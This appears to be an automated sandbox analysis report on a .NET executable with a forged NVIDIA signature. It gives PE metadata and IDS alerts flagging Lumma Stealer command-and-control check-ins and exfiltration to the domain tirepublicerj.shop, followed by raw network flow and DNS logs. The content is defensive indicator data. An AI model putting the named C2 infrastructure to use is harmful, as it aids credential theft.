                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Signature Valid:false
                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                      Signature Validation Error:The digital signature of the object did not verify
                                                      Error Number:-2146869232
                                                      Not Before, Not After
                                                      • 13/01/2023 00:00:00 16/01/2026 23:59:59
                                                      Subject Chain
                                                      • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                      Version:3
                                                      Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                      Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                      Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                      Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xda900x4b.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x598.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x5d0000x2628.BSS
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xda410x1c.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xbae40xbc0019f0b50531f98a20a9a65d39c849687cFalse0.5685048204787234data6.109180699584785IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0xe0000x5980x6000952258526daaa3e0a687f3a06f53a5dFalse0.4114583333333333data4.03365806651715IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x100000xc0x2008213ad787590c8df00be095c16f90f29False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      .BSS0x120000x508000x508002222f87b85ae0a7a267bc50cd850219aFalse1.0003366411102483data7.999369568013561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_VERSION0xe0a00x30cdata0.41923076923076924
                                                      RT_MANIFEST0xe3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                      DLLImport
                                                      mscoree.dll_CorExeMain
                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2025-01-04T22:58:07.459055+01002058628ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop)1192.168.2.4503651.1.1.153UDP
                                                      2025-01-04T22:58:08.034243+01002058629ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)1192.168.2.449733104.21.64.1443TCP
                                                      2025-01-04T22:58:08.034243+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.64.1443TCP
                                                      2025-01-04T22:58:08.548914+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449733104.21.64.1443TCP
                                                      2025-01-04T22:58:08.548914+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733104.21.64.1443TCP
                                                      2025-01-04T22:58:09.019156+01002058629ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)1192.168.2.449735104.21.64.1443TCP
                                                      2025-01-04T22:58:09.019156+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.64.1443TCP
                                                      2025-01-04T22:58:09.491546+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449735104.21.64.1443TCP
                                                      2025-01-04T22:58:09.491546+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449735104.21.64.1443TCP
                                                      2025-01-04T22:58:10.221347+01002058629ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)1192.168.2.449737104.21.64.1443TCP
                                                      2025-01-04T22:58:10.221347+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.64.1443TCP
                                                      2025-01-04T22:58:11.328741+01002058629ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)1192.168.2.449740104.21.64.1443TCP
                                                      2025-01-04T22:58:11.328741+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.64.1443TCP
                                                      2025-01-04T22:58:11.823080+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449740104.21.64.1443TCP
                                                      2025-01-04T22:58:12.715275+01002058629ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)1192.168.2.449742104.21.64.1443TCP
                                                      2025-01-04T22:58:12.715275+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.64.1443TCP
                                                      2025-01-04T22:58:13.997441+01002058629ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)1192.168.2.449744104.21.64.1443TCP
                                                      2025-01-04T22:58:13.997441+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.64.1443TCP
                                                      2025-01-04T22:58:15.331970+01002058629ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)1192.168.2.449745104.21.64.1443TCP
                                                      2025-01-04T22:58:15.331970+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745104.21.64.1443TCP
                                                      2025-01-04T22:58:15.336589+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449745104.21.64.1443TCP
                                                      2025-01-04T22:58:17.342354+01002058629ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)1192.168.2.449746104.21.64.1443TCP
                                                      2025-01-04T22:58:17.342354+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746104.21.64.1443TCP
                                                      2025-01-04T22:58:17.803148+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449746104.21.64.1443TCP
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 4, 2025 22:58:07.477515936 CET49733443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:07.477565050 CET44349733104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:07.477632999 CET49733443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:07.480812073 CET49733443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:07.480829000 CET44349733104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:08.034168959 CET44349733104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:08.034243107 CET49733443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:08.039426088 CET49733443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:08.039438963 CET44349733104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:08.039817095 CET44349733104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:08.093066931 CET49733443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:08.129007101 CET49733443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:08.129065990 CET49733443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:08.129118919 CET44349733104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:08.548911095 CET44349733104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:08.549027920 CET44349733104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:08.549179077 CET49733443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:08.550983906 CET49733443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:08.551017046 CET44349733104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:08.551039934 CET49733443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:08.551047087 CET44349733104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:08.558742046 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:08.558780909 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:08.558873892 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:08.559150934 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:08.559166908 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.019071102 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.019155979 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.025194883 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.025224924 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.025451899 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.028140068 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.028189898 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.028213978 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.491539001 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.491607904 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.491655111 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.491714001 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.491718054 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.491748095 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.491763115 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.491786957 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.491827965 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.491830111 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.491842985 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.491878033 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.492322922 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.498073101 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.498120070 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.498142958 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.498163939 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.499347925 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.579449892 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.579541922 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.579575062 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.579612017 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.579629898 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.579678059 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.579724073 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.579773903 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.579894066 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.579909086 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.579924107 CET49735443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.579930067 CET44349735104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.715475082 CET49737443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.715533972 CET44349737104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:09.715601921 CET49737443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.716062069 CET49737443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:09.716080904 CET44349737104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:10.221235991 CET44349737104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:10.221347094 CET49737443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:10.222412109 CET49737443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:10.222423077 CET44349737104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:10.222664118 CET44349737104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:10.229598999 CET49737443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:10.229731083 CET49737443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:10.229764938 CET44349737104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:10.229890108 CET49737443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:10.229898930 CET44349737104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:10.848170996 CET44349737104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:10.848289013 CET44349737104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:10.848495960 CET49737443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:10.848576069 CET49737443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:10.848596096 CET44349737104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:10.865011930 CET49740443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:10.865048885 CET44349740104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:10.865201950 CET49740443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:10.865513086 CET49740443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:10.865526915 CET44349740104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:11.328669071 CET44349740104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:11.328741074 CET49740443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:11.330002069 CET49740443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:11.330007076 CET44349740104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:11.330234051 CET44349740104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:11.338871002 CET49740443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:11.338983059 CET49740443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:11.339001894 CET44349740104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:11.823075056 CET44349740104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:11.823189974 CET44349740104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:11.823266029 CET49740443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:11.844310045 CET49740443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:11.844329119 CET44349740104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:12.220915079 CET49742443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:12.220966101 CET44349742104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:12.221041918 CET49742443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:12.242572069 CET49742443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:12.242589951 CET44349742104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:12.715194941 CET44349742104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:12.715275049 CET49742443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:12.717034101 CET49742443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:12.717041016 CET44349742104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:12.717282057 CET44349742104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:12.725873947 CET49742443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:12.726010084 CET49742443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:12.726047993 CET44349742104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:12.726119041 CET49742443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:12.726130009 CET44349742104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:13.328754902 CET44349742104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:13.328852892 CET44349742104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:13.328931093 CET49742443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:13.329130888 CET49742443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:13.329144001 CET44349742104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:13.530878067 CET49744443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:13.530926943 CET44349744104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:13.531084061 CET49744443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:13.534310102 CET49744443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:13.534326077 CET44349744104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:13.997315884 CET44349744104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:13.997441053 CET49744443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:13.998975039 CET49744443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:13.998985052 CET44349744104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:13.999214888 CET44349744104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:14.008567095 CET49744443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:14.008651018 CET49744443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:14.008656979 CET44349744104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:14.495029926 CET44349744104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:14.495150089 CET44349744104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:14.495246887 CET49744443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:14.495518923 CET49744443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:14.495537043 CET44349744104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:14.847070932 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:14.847110033 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:14.847208023 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:14.847548962 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:14.847562075 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:15.331903934 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:15.331969976 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.333563089 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.333581924 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:15.333823919 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:15.335072994 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.335871935 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.335905075 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:15.335990906 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.336028099 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:15.336119890 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.336185932 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:15.336308956 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.336334944 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:15.336461067 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.336483002 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:15.336658955 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.336695910 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:15.336704969 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.336802006 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.336838961 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.345963001 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:15.346142054 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.346169949 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:15.346195936 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.346214056 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.346267939 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.346288919 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.350990057 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:15.351104021 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:15.351133108 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:16.857780933 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:16.857892036 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:16.857959986 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:16.858196020 CET49745443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:16.858216047 CET44349745104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:16.863373995 CET49746443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:16.863423109 CET44349746104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:16.863517046 CET49746443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:16.863807917 CET49746443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:16.863820076 CET44349746104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:17.342168093 CET44349746104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:17.342354059 CET49746443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:17.344381094 CET49746443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:17.344393015 CET44349746104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:17.344635963 CET44349746104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:17.345947027 CET49746443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:17.345968962 CET49746443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:17.346021891 CET44349746104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:17.803164005 CET44349746104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:17.803267002 CET44349746104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:17.803340912 CET49746443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:17.803514957 CET49746443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:17.803540945 CET44349746104.21.64.1192.168.2.4
                                                      Jan 4, 2025 22:58:17.803558111 CET49746443192.168.2.4104.21.64.1
                                                      Jan 4, 2025 22:58:17.803565979 CET44349746104.21.64.1192.168.2.4
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 4, 2025 22:58:07.459054947 CET5036553192.168.2.41.1.1.1
                                                      Jan 4, 2025 22:58:07.472575903 CET53503651.1.1.1192.168.2.4
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 4, 2025 22:58:07.459054947 CET192.168.2.41.1.1.10xa231Standard query (0)tirepublicerj.shopA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 4, 2025 22:58:07.472575903 CET1.1.1.1192.168.2.40xa231No error (0)tirepublicerj.shop104.21.64.1A (IP address)IN (0x0001)false
                                                      Jan 4, 2025 22:58:07.472575903 CET1.1.1.1192.168.2.40xa231No error (0)tirepublicerj.shop104.21.32.1A (IP address)IN (0x0001)false
                                                      Jan 4, 2025 22:58:07.472575903 CET1.1.1.1192.168.2.40xa231No error (0)tirepublicerj.shop104.21.48.1A (IP address)IN (0x0001)false
                                                      Jan 4, 2025 22:58:07.472575903 CET1.1.1.1192.168.2.40xa231No error (0)tirepublicerj.shop104.21.80.1A (IP address)IN (0x0001)false
                                                      Jan 4, 2025 22:58:07.472575903 CET1.1.1.1192.168.2.40xa231No error (0)tirepublicerj.shop104.21.16.1A (IP address)IN (0x0001)false
